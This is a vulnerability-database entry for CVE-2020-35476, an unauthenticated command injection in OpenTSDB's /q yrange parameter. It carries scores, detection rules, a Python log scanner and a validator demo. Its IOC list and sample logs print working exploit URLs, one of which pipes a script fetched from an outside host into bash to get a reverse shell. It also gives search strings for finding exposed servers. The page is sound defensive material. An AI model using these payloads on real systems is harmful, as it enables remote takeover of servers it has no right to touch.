cbcvebase.
CVE-2020-35476
published 2020-12-16


Priority: P1 (90) · Severity: critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Flags: ITW · Exploit available · VulnCheck KEV (exploited in the wild)
EPSS: 85.33% (99.7th percentile)
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)

Affected

2 ranges
Vendor     Product    Version range    Fixed in
opentsdb   opentsdb   <= 2.4.0
opentsdb   opentsdb   1.0.0 – 2.4.1

Detection & IOCs (extracted from sources)

url: /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
url: /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=[33:system('curl${IFS}http://10.10.14.14:8000/rev.sh|bash')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
url: http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
port: 4242
other: shodan: html:"OpenTSDB"
other: fofa: body="opentsdb"
  • Detect exploitation attempts by matching HTTP GET requests to the OpenTSDB /q endpoint whose 'yrange' parameter contains the substring 'system(', which indicates an OS command injection attempt.
  • Alert on HTTP responses from the OpenTSDB /q endpoint whose JSON body contains all three of 'plotted', 'timing' and 'cachehit'; this confirms that the graph was rendered, i.e. that the injected gnuplot file was processed. These keys are returned by every successful /q render, so use this matcher only to confirm a request already flagged by the request-side rule, not as an indicator on its own.
  • The Metasploit module first queries the OpenTSDB version endpoint (/api/version) before exploitation; monitor for a request to that endpoint followed from the same source by a /q request whose yrange parameter contains a bracket-enclosed system() call.
  • The injected command in yrange follows the pattern [33:system('...')]. Look for both URL-encoded (e.g. system(%27) and plaintext occurrences of 'system(' within the yrange query parameter of requests to /q; decode the parameter before matching.
  • The fix for CVE-2020-35476 was incomplete; the regex validation it added to the query API can be bypassed. Inspect all parameters of the legacy HTTP query API (/q), not just yrange, for crafted OS command injection patterns.
  • The vulnerability is exploitable without authentication; no credentials are required to trigger the yrange command injection via the /q HTTP API endpoint.
  • Because the original fix was incomplete, a bypass (tracked separately) exists in which crafted commands evade the regex validation added to the query API. Treat a patched 2.4.x instance as exposed until the follow-up fix is confirmed.
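The following Python is an added example, not OpenTSDB's code and not the Nuclei template or Metasploit module the entries above refer to. It covers two points from this page in one place: the description's remark that tsd/GraphHandler.java only blocked backticks (reconstructed as a backtick-only check beside a numeric allowlist that rejects the [33:system('...')] shape), and the detection rules above (request-side matching on a decoded yrange, the /api/version-then-/q sequence, and the response-side confirmation), run over a handful of constructed access-log lines. The allowlist regex, the combined-log format, the IP addresses and the log lines themselves are assumptions for the demo; /api/version is OpenTSDB's documented version endpoint.

```python
"""Added example for CVE-2020-35476: not OpenTSDB's code, not the Nuclei
template or the Metasploit module.  Sample log lines are constructed."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# --- 1. Why blocking backticks was not enough -------------------------------
# Reconstruction of the check the page attributes to tsd/GraphHandler.java:
# reject only the backtick character.  The payload shape used in the wild,
# [33:system('...')], contains no backtick, so it passes untouched.
def backtick_filter_accepts(yrange: str) -> bool:
    return "`" not in yrange

# Allowlist a fixed handler could apply instead: optional brackets around two
# optional numeric bounds, e.g. "[0:100]", "[:50]", "10:10", or empty.
# Letters, quotes, parentheses and "$" never match, so no shell text can reach
# the generated gnuplot script.  Assumption: illustrative validator only, not
# the regex the project shipped (the page notes that one could be bypassed).
_SAFE_YRANGE = re.compile(r"\[?-?(?:\d+(?:\.\d*)?)?:-?(?:\d+(?:\.\d*)?)?\]?")

def allowlist_accepts(yrange: str) -> bool:
    return yrange == "" or _SAFE_YRANGE.fullmatch(yrange) is not None

# --- 2. Detecting exploitation attempts in access logs ----------------------
_SYSTEM_CALL = re.compile(r"system\s*\(", re.IGNORECASE)
# Combined-log-format prefix (assumed): source IP ... "METHOD target HTTP/x.y"
_LOG_LINE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

def yrange_from_target(target: str):
    """Return the decoded yrange parameter of a /q request, or None."""
    parts = urlsplit(target)
    if parts.path != "/q":
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("yrange")
    if not values:
        return None
    # parse_qs percent-decodes once; decode again so a double-encoded payload
    # ("system%2528") does not slip past the substring check.
    return unquote(values[0])

def classify_request(target: str) -> str:
    """'probe' for the version endpoint, 'exploit' for /q with system( in
    yrange, 'benign' otherwise."""
    if urlsplit(target).path == "/api/version":
        return "probe"
    yrange = yrange_from_target(target)
    if yrange is not None and _SYSTEM_CALL.search(yrange):
        return "exploit"
    return "benign"

def scan_log(lines):
    """Return (alerts, staged): alerts is [(src, decoded_yrange)] for every
    exploit request; staged is the set of sources that hit /api/version before
    their exploit request, the sequence the Metasploit module produces."""
    alerts, probed, staged = [], set(), set()
    for line in lines:
        match = _LOG_LINE.match(line)
        if not match:
            continue
        src, target = match.group("src"), match.group("target")
        verdict = classify_request(target)
        if verdict == "probe":
            probed.add(src)
        elif verdict == "exploit":
            alerts.append((src, yrange_from_target(target)))
            if src in probed:
                staged.add(src)
    return alerts, staged

def response_confirms_render(body: str) -> bool:
    """True when a /q JSON body carries 'plotted', 'timing' and 'cachehit'.
    Every successful render returns these keys, so use this only to confirm
    that a request already flagged by scan_log() was actually executed."""
    return all(key in body for key in ("plotted", "timing", "cachehit"))

# Constructed sample log (not real traffic).  Line 3 is modelled on the touch
# PoC URL from the IOC list, line 4 on the ${IFS} variant, line 5 is a fully
# URL-encoded form of the same payload shape.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/Dec/2020:10:00:01 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=[0:100]&json HTTP/1.1" 200 412',
    '10.10.14.14 - - [16/Dec/2020:10:00:02 +0000] "GET /api/version HTTP/1.1" 200 180',
    '10.10.14.14 - - [16/Dec/2020:10:00:03 +0000] "GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27touch%20/tmp/poc.txt%27)]&wxh=1516x644&style=linespoint&grid=t&json HTTP/1.1" 200 98',
    '10.0.0.9 - - [16/Dec/2020:10:00:04 +0000] "GET /q?start=1h-ago&m=sum:http.stats.web.hits&yrange=[33:system(\'curl${IFS}http://10.10.14.14:8000/rev.sh|bash\')]&json HTTP/1.1" 200 98',
    '10.0.0.7 - - [16/Dec/2020:10:00:05 +0000] "GET /q?start=1h-ago&m=sum:sys.cpu.nice&yrange=%5B33%3Asystem%28%27id%27%29%5D&json HTTP/1.1" 200 98',
]

if __name__ == "__main__":
    alerts, staged = scan_log(SAMPLE_LOG)
    for src, payload in alerts:
        tag = " (version probe seen first)" if src in staged else ""
        print(f"ALERT {src}{tag}: yrange={payload}")
```

Running the block prints three alerts; the first is also marked as preceded by the version probe, which is the sequence the Metasploit note above describes. The design point is that the detection decodes the yrange value before matching, so the percent-encoded and plaintext IOC forms on this page are caught by one rule, while the validator side shows why a deny-list of a single character cannot protect a value that is written into a script and executed.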

CVSS provenance

Source      Version  Score  Severity  Vector
nvd         v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0     7.5    HIGH      AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa                 9.8    CRITICAL
osv                  9.8    CRITICAL
vulncheck            9.8    CRITICAL